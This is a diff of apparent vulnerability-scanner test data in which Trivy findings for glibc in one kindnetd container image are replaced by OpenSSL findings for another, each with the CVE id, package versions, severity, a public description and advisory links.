"https://linux.oracle.com/errata/ELSA-2023-3722.html", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/107160", + "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2018-20796", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-2650", }, { "type": "URL", - "value": "https://debbugs.gnu.org/cgi/bugreport.cgi?bug=34141", + "value": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2023-0009", }, { "type": "URL", - "value": "https://lists.gnu.org/archive/html/bug-gnulib/2019-01/msg00108.html", + "value": "https://ubuntu.com/security/notices/USN-6119-1", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-20796", + "value": "https://ubuntu.com/security/notices/USN-6188-1", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20190315-0002/", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-2650", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", + "value": "https://www.debian.org/security/2023/dsa-5417", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2018-20796", + "value": "https://www.openssl.org/news/secadv/20230530.txt", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-1010022", - "installedVersion": "2.31-13+deb11u3", - "packageName": "libc-bin", + "fixedVersion": "1.1.1d-0+deb10u5", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-1551", + "installedVersion": "1.1.1d-0+deb10u4", + "packageName": "libssl1.1", "references": [ - "https://access.redhat.com/security/cve/CVE-2019-1010022", - "https://nvd.nist.gov/vuln/detail/CVE-2019-1010022", - "https://security-tracker.debian.org/tracker/CVE-2019-1010022", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22850", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22850#c3", - "https://ubuntu.com/security/CVE-2019-1010022", - "https://www.cve.org/CVERecord?id=CVE-2019-1010022", + "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00030.html", + "http://packetstormsecurity.com/files/155754/Slackware-Security-Advisory-openssl-Updates.html", + "https://access.redhat.com/security/cve/CVE-2019-1551", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1551", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=419102400a2811582a7a3d4a4e317d72e5ce0a8f", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=f1c5eea8a817075d31e43f5876993c6710238c98", + "https://github.com/openssl/openssl/pull/10575", + "https://linux.oracle.com/cve/CVE-2019-1551.html", + "https://linux.oracle.com/errata/ELSA-2020-4514.html", + "https://lists.debian.org/debian-lts-announce/2022/03/msg00023.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DDHOAATPWJCXRNFMJ2SASDBBNU5RJONY/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EXDDAOWSAIEFQNBHWYE6PPYFV4QXGMCD/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XVEP3LAK4JSPRXFO4QF4GG2IVXADV3SO/", + "https://nvd.nist.gov/vuln/detail/CVE-2019-1551", + "https://seclists.org/bugtraq/2019/Dec/39", + "https://seclists.org/bugtraq/2019/Dec/46", + "https://security.gentoo.org/glsa/202004-10", + "https://security.netapp.com/advisory/ntap-20191210-0001/", + "https://ubuntu.com/security/notices/USN-4376-1", + "https://ubuntu.com/security/notices/USN-4504-1", + "https://usn.ubuntu.com/4376-1/", + "https://usn.ubuntu.com/4504-1/", + "https://www.cve.org/CVERecord?id=CVE-2019-1551", + "https://www.debian.org/security/2019/dsa-4594", + "https://www.debian.org/security/2021/dsa-4855", + "https://www.openssl.org/news/secadv/20191206.txt", + "https://www.oracle.com/security-alerts/cpuApr2021.html", + "https://www.oracle.com/security-alerts/cpujan2021.html", + "https://www.oracle.com/security-alerts/cpujul2020.html", + "https://www.tenable.com/security/tns-2019-09", + "https://www.tenable.com/security/tns-2020-03", + "https://www.tenable.com/security/tns-2020-11", + "https://www.tenable.com/security/tns-2021-10", ], }, "category": "Vulnerability", - "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may bypass stack guard protection. The component is: nptl. The attack vector is: Exploit stack buffer overflow vulnerability and use this bypass vulnerability to bypass stack guard. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", + "description": "There is an overflow bug in the x64_64 Montgomery squaring procedure used in exponentiation with 512-bit moduli. No EC algorithms are affected. Analysis suggests that attacks against 2-prime RSA1024, 3-prime RSA1536, and DSA1024 as a result of this defect would be very difficult to perform and are not believed likely. Attacks against DH512 are considered just feasible. However, for an attack the target would have to re-use the DH512 private key, which is not recommended anyway. Also applications directly using the low level API BN_mod_exp may be affected if they use BN_FLG_CONSTTIME. Fixed in OpenSSL 1.1.1e (Affected 1.1.1-1.1.1d). Fixed in OpenSSL 1.0.2u (Affected 1.0.2-1.0.2t).", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "glibc: stack guard protection bypass", + "name": "openssl: Integer overflow in RSAZ modular exponentiation on x86_64", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-1010022", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-1010022", - }, - { - "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010022", + "value": "https://avd.aquasec.com/nvd/cve-2019-1551", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010022", + "value": "http://lists.opensuse.org/opensuse-security-announce/2020-01/msg00030.html", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22850", + "value": "http://packetstormsecurity.com/files/155754/Slackware-Security-Advisory-openssl-Updates.html", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22850#c3", + "value": "https://access.redhat.com/security/cve/CVE-2019-1551", }, { "type": "URL", - "value": "https://ubuntu.com/security/CVE-2019-1010022", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-1551", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010022", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=419102400a2811582a7a3d4a4e317d72e5ce0a8f", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-1010023", - "installedVersion": "2.31-13+deb11u3", - "packageName": "libc-bin", - "references": [ - "http://www.securityfocus.com/bid/109167", - "https://access.redhat.com/security/cve/CVE-2019-1010023", - "https://nvd.nist.gov/vuln/detail/CVE-2019-1010023", - "https://security-tracker.debian.org/tracker/CVE-2019-1010023", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22851", - "https://support.f5.com/csp/article/K11932200?utm_source=f5support&utm_medium=RSS", - "https://ubuntu.com/security/CVE-2019-1010023", - "https://www.cve.org/CVERecord?id=CVE-2019-1010023", - ], - }, - "category": "Vulnerability", - "description": "** DISPUTED ** GNU Libc current is affected by: Re-mapping current loaded library with malicious ELF file. The impact is: In worst case attacker may evaluate privileges. The component is: libld. The attack vector is: Attacker sends 2 ELF files to victim and asks to run ldd on it. ldd execute code. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "glibc: running ldd on malicious ELF leads to code execution because of wrong size computation", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-1010023", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=f1c5eea8a817075d31e43f5876993c6710238c98", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/109167", + "value": "https://github.com/openssl/openssl/pull/10575", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-1010023", + "value": "https://linux.oracle.com/cve/CVE-2019-1551.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010023", + "value": "https://linux.oracle.com/errata/ELSA-2020-4514.html", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010023", + "value": "https://lists.debian.org/debian-lts-announce/2022/03/msg00023.html", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22851", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DDHOAATPWJCXRNFMJ2SASDBBNU5RJONY/", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K11932200?utm_source=f5support&utm_medium=RSS", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EXDDAOWSAIEFQNBHWYE6PPYFV4QXGMCD/", }, { "type": "URL", - "value": "https://ubuntu.com/security/CVE-2019-1010023", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XVEP3LAK4JSPRXFO4QF4GG2IVXADV3SO/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010023", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1551", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-1010024", - "installedVersion": "2.31-13+deb11u3", - "packageName": "libc-bin", - "references": [ - "http://www.securityfocus.com/bid/109162", - "https://access.redhat.com/security/cve/CVE-2019-1010024", - "https://nvd.nist.gov/vuln/detail/CVE-2019-1010024", - "https://security-tracker.debian.org/tracker/CVE-2019-1010024", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22852", - "https://support.f5.com/csp/article/K06046097", - "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", - "https://ubuntu.com/security/CVE-2019-1010024", - "https://www.cve.org/CVERecord?id=CVE-2019-1010024", - ], - }, - "category": "Vulnerability", - "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may bypass ASLR using cache of thread stack and heap. The component is: glibc. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "glibc: ASLR bypass using cache of thread stack and heap", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-1010024", + "value": "https://seclists.org/bugtraq/2019/Dec/39", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/109162", + "value": "https://seclists.org/bugtraq/2019/Dec/46", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-1010024", + "value": "https://security.gentoo.org/glsa/202004-10", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010024", + "value": "https://security.netapp.com/advisory/ntap-20191210-0001/", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010024", + "value": "https://ubuntu.com/security/notices/USN-4376-1", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22852", + "value": "https://ubuntu.com/security/notices/USN-4504-1", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K06046097", + "value": "https://usn.ubuntu.com/4376-1/", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", + "value": "https://usn.ubuntu.com/4504-1/", }, { "type": "URL", - "value": "https://ubuntu.com/security/CVE-2019-1010024", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-1551", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010024", + "value": "https://www.debian.org/security/2019/dsa-4594", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-1010025", - "installedVersion": "2.31-13+deb11u3", - "packageName": "libc-bin", - "references": [ - "https://access.redhat.com/security/cve/CVE-2019-1010025", - "https://nvd.nist.gov/vuln/detail/CVE-2019-1010025", - "https://security-tracker.debian.org/tracker/CVE-2019-1010025", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22853", - "https://support.f5.com/csp/article/K06046097", - "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", - "https://ubuntu.com/security/CVE-2019-1010025", - "https://www.cve.org/CVERecord?id=CVE-2019-1010025", - ], - }, - "category": "Vulnerability", - "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may guess the heap addresses of pthread_created thread. The component is: glibc. NOTE: the vendor's position is "ASLR bypass itself is not a vulnerability."", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "glibc: information disclosure of heap addresses of pthread_created thread", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-1010025", + "value": "https://www.debian.org/security/2021/dsa-4855", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-1010025", + "value": "https://www.openssl.org/news/secadv/20191206.txt", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010025", + "value": "https://www.oracle.com/security-alerts/cpuApr2021.html", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010025", + "value": "https://www.oracle.com/security-alerts/cpujan2021.html", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22853", + "value": "https://www.oracle.com/security-alerts/cpujul2020.html", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K06046097", + "value": "https://www.tenable.com/security/tns-2019-09", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", + "value": "https://www.tenable.com/security/tns-2020-03", }, { "type": "URL", - "value": "https://ubuntu.com/security/CVE-2019-1010025", + "value": "https://www.tenable.com/security/tns-2020-11", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010025", + "value": "https://www.tenable.com/security/tns-2021-10", }, ], - "severity": "LOW", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-9192", - "installedVersion": "2.31-13+deb11u3", - "packageName": "libc-bin", + "fixedVersion": "1.1.1d-0+deb10u5", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-23841", + "installedVersion": "1.1.1d-0+deb10u4", + "packageName": "libssl1.1", "references": [ - "https://access.redhat.com/security/cve/CVE-2019-9192", - "https://nvd.nist.gov/vuln/detail/CVE-2019-9192", - "https://sourceware.org/bugzilla/show_bug.cgi?id=24269", - "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", - "https://www.cve.org/CVERecord?id=CVE-2019-9192", + "http://seclists.org/fulldisclosure/2021/May/67", + "http://seclists.org/fulldisclosure/2021/May/68", + "http://seclists.org/fulldisclosure/2021/May/70", + "https://access.redhat.com/security/cve/CVE-2021-23841", + "https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23841", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=122a19ab48091c657f7cb1fb3af9fc07bd557bbf", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=6a51b9e1d0cf0bf8515f7201b68fb0a3482b3dc1", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=8252ee4d90f3f2004d3d0aeeed003ad49c9a7807", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9b1129239f3ebb1d1c98ce9ed41d5c9476c47cb2", + "https://github.com/advisories/GHSA-84rm-qf37-fgc2", + "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44846", + "https://linux.oracle.com/cve/CVE-2021-23841.html", + "https://linux.oracle.com/errata/ELSA-2021-9561.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-23841", + "https://rustsec.org/advisories/RUSTSEC-2021-0058", + "https://rustsec.org/advisories/RUSTSEC-2021-0058.html", + "https://security.gentoo.org/glsa/202103-03", + "https://security.netapp.com/advisory/ntap-20210219-0009/", + "https://security.netapp.com/advisory/ntap-20210513-0002/", + "https://support.apple.com/kb/HT212528", + "https://support.apple.com/kb/HT212529", + "https://support.apple.com/kb/HT212534", + "https://ubuntu.com/security/notices/USN-4738-1", + "https://ubuntu.com/security/notices/USN-4745-1", + "https://www.cve.org/CVERecord?id=CVE-2021-23841", + "https://www.debian.org/security/2021/dsa-4855", + "https://www.openssl.org/news/secadv/20210216.txt", + "https://www.oracle.com//security-alerts/cpujul2021.html", + "https://www.oracle.com/security-alerts/cpuApr2021.html", + "https://www.oracle.com/security-alerts/cpuapr2022.html", + "https://www.oracle.com/security-alerts/cpuoct2021.html", + "https://www.tenable.com/security/tns-2021-03", + "https://www.tenable.com/security/tns-2021-09", ], }, "category": "Vulnerability", - "description": "** DISPUTED ** In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by '(|)(\\\\1\\\\1)*' in grep, a different issue than CVE-2018-20796. NOTE: the software maintainer disputes that this is a vulnerability because the behavior occurs only with a crafted pattern.", + "description": "The OpenSSL public API function X509_issuer_and_serial_hash() attempts to create a unique hash value based on the issuer and serial number data contained within an X509 certificate. However it fails to correctly handle any errors that may occur while parsing the issuer field (which might occur if the issuer field is maliciously constructed). This may subsequently result in a NULL pointer deref and a crash leading to a potential denial of service attack. The function X509_issuer_and_serial_hash() is never directly called by OpenSSL itself so applications are only vulnerable if they use this function directly and they use it on certificates that may have been obtained from untrusted sources. OpenSSL versions 1.1.1i and below are affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1j. OpenSSL versions 1.0.2x and below are affected by this issue. However OpenSSL 1.0.2 is out of support and no longer receiving public updates. Premium support customers of OpenSSL 1.0.2 should upgrade to 1.0.2y. Other users should upgrade to 1.1.1j. Fixed in OpenSSL 1.1.1j (Affected 1.1.1-1.1.1i). Fixed in OpenSSL 1.0.2y (Affected 1.0.2-1.0.2x).", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "glibc: uncontrolled recursion in function check_dst_limits_calc_pos_1 in posix/regexec.c", + "name": "openssl: NULL pointer dereference in X509_issuer_and_serial_hash()", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-9192", + "value": "https://avd.aquasec.com/nvd/cve-2021-23841", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-9192", + "value": "http://seclists.org/fulldisclosure/2021/May/67", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-9192", + "value": "http://seclists.org/fulldisclosure/2021/May/68", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=24269", + "value": "http://seclists.org/fulldisclosure/2021/May/70", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", + "value": "https://access.redhat.com/security/cve/CVE-2021-23841", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-9192", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": "2.31-13+deb11u4", - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2021-3999", - "installedVersion": "2.31-13+deb11u3", - "packageName": "libc6", - "references": [ - "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3999.json", - "https://access.redhat.com/security/cve/CVE-2021-3999", - "https://bugzilla.redhat.com/show_bug.cgi?id=2024637", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3999", - "https://linux.oracle.com/cve/CVE-2021-3999.html", - "https://linux.oracle.com/errata/ELSA-2022-9234.html", - "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-3999", - "https://security-tracker.debian.org/tracker/CVE-2021-3999", - "https://security.netapp.com/advisory/ntap-20221104-0001/", - "https://sourceware.org/bugzilla/show_bug.cgi?id=28769", - "https://sourceware.org/git/gitweb.cgi?p=glibc.git%3Bh=23e0e8f5f1fb5ed150253d986ecccdc90c2dcd5e", - "https://ubuntu.com/security/notices/USN-5310-1", - "https://ubuntu.com/security/notices/USN-5310-2", - "https://www.cve.org/CVERecord?id=CVE-2021-3999", - "https://www.openwall.com/lists/oss-security/2022/01/24/4", - ], - }, - "category": "Vulnerability", - "description": "A flaw was found in glibc. An off-by-one buffer overflow and underflow in getcwd() may lead to memory corruption when the size of the buffer is exactly 1. A local attacker who can control the input buffer and size passed to getcwd() in a setuid program could use this flaw to potentially execute arbitrary code and escalate their privileges on the system.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "glibc: Off-by-one buffer overflow/underflow in getcwd()", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-3999", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23841", }, { "type": "URL", - "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2021-3999.json", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=122a19ab48091c657f7cb1fb3af9fc07bd557bbf", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-3999", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=6a51b9e1d0cf0bf8515f7201b68fb0a3482b3dc1", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2024637", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=8252ee4d90f3f2004d3d0aeeed003ad49c9a7807", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3999", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=9b1129239f3ebb1d1c98ce9ed41d5c9476c47cb2", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-3999.html", + "value": "https://github.com/advisories/GHSA-84rm-qf37-fgc2", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9234.html", + "value": "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44846", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html", + "value": "https://linux.oracle.com/cve/CVE-2021-23841.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3999", + "value": "https://linux.oracle.com/errata/ELSA-2021-9561.html", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2021-3999", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-23841", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20221104-0001/", + "value": "https://rustsec.org/advisories/RUSTSEC-2021-0058", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=28769", + "value": "https://rustsec.org/advisories/RUSTSEC-2021-0058.html", }, { "type": "URL", - "value": "https://sourceware.org/git/gitweb.cgi?p=glibc.git%3Bh=23e0e8f5f1fb5ed150253d986ecccdc90c2dcd5e", + "value": "https://security.gentoo.org/glsa/202103-03", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-1", + "value": "https://security.netapp.com/advisory/ntap-20210219-0009/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5310-2", + "value": "https://security.netapp.com/advisory/ntap-20210513-0002/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-3999", + "value": "https://support.apple.com/kb/HT212528", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2022/01/24/4", + "value": "https://support.apple.com/kb/HT212529", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2010-4756", - "installedVersion": "2.31-13+deb11u3", - "packageName": "libc6", - "references": [ - "http://cxib.net/stuff/glob-0day.c", - "http://securityreason.com/achievement_securityalert/89", - "http://securityreason.com/exploitalert/9223", - "https://access.redhat.com/security/cve/CVE-2010-4756", - "https://bugzilla.redhat.com/show_bug.cgi?id=681681", - "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2010-4756", - "https://nvd.nist.gov/vuln/detail/CVE-2010-4756", - "https://www.cve.org/CVERecord?id=CVE-2010-4756", - ], - }, - "category": "Vulnerability", - "description": "The glob implementation in the GNU C Library (aka glibc or libc6) allows remote authenticated users to cause a denial of service (CPU and memory consumption) via crafted glob expressions that do not match any pathnames, as demonstrated by glob expressions in STAT commands to an FTP daemon, a different vulnerability than CVE-2010-2632.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "glibc: glob implementation can cause excessive CPU and memory consumption due to crafted glob expressions", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2010-4756", + "value": "https://support.apple.com/kb/HT212534", }, { "type": "URL", - "value": "http://cxib.net/stuff/glob-0day.c", + "value": "https://ubuntu.com/security/notices/USN-4738-1", }, { "type": "URL", - "value": "http://securityreason.com/achievement_securityalert/89", + "value": "https://ubuntu.com/security/notices/USN-4745-1", }, { "type": "URL", - "value": "http://securityreason.com/exploitalert/9223", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-23841", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2010-4756", + "value": "https://www.debian.org/security/2021/dsa-4855", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=681681", + "value": "https://www.openssl.org/news/secadv/20210216.txt", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2010-4756", + "value": "https://www.oracle.com//security-alerts/cpujul2021.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2010-4756", + "value": "https://www.oracle.com/security-alerts/cpuApr2021.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2010-4756", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + }, + { + "type": "URL", + "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", + }, + { + "type": "URL", + "value": "https://www.tenable.com/security/tns-2021-03", + }, + { + "type": "URL", + "value": "https://www.tenable.com/security/tns-2021-09", }, ], - "severity": "LOW", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2018-20796", - "installedVersion": "2.31-13+deb11u3", - "packageName": "libc6", + "fixedVersion": "1.1.1d-0+deb10u6", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-3449", + "installedVersion": "1.1.1d-0+deb10u4", + "packageName": "libssl1.1", "references": [ - "http://www.securityfocus.com/bid/107160", - "https://access.redhat.com/security/cve/CVE-2018-20796", - "https://debbugs.gnu.org/cgi/bugreport.cgi?bug=34141", - "https://lists.gnu.org/archive/html/bug-gnulib/2019-01/msg00108.html", - "https://nvd.nist.gov/vuln/detail/CVE-2018-20796", - "https://security.netapp.com/advisory/ntap-20190315-0002/", - "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", - "https://www.cve.org/CVERecord?id=CVE-2018-20796", + "http://www.openwall.com/lists/oss-security/2021/03/27/1", + "http://www.openwall.com/lists/oss-security/2021/03/27/2", + "http://www.openwall.com/lists/oss-security/2021/03/28/3", + "http://www.openwall.com/lists/oss-security/2021/03/28/4", + "https://access.redhat.com/security/cve/CVE-2021-3449", + "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", + "https://cert-portal.siemens.com/productcert/pdf/ssa-772220.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3449", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fb9fa6b51defd48157eeb207f52181f735d96148", + "https://github.com/advisories/GHSA-83mx-573x-5rw9", + "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44845", + "https://kc.mcafee.com/corporate/index?page=content&id=SB10356", + "https://linux.oracle.com/cve/CVE-2021-3449.html", + 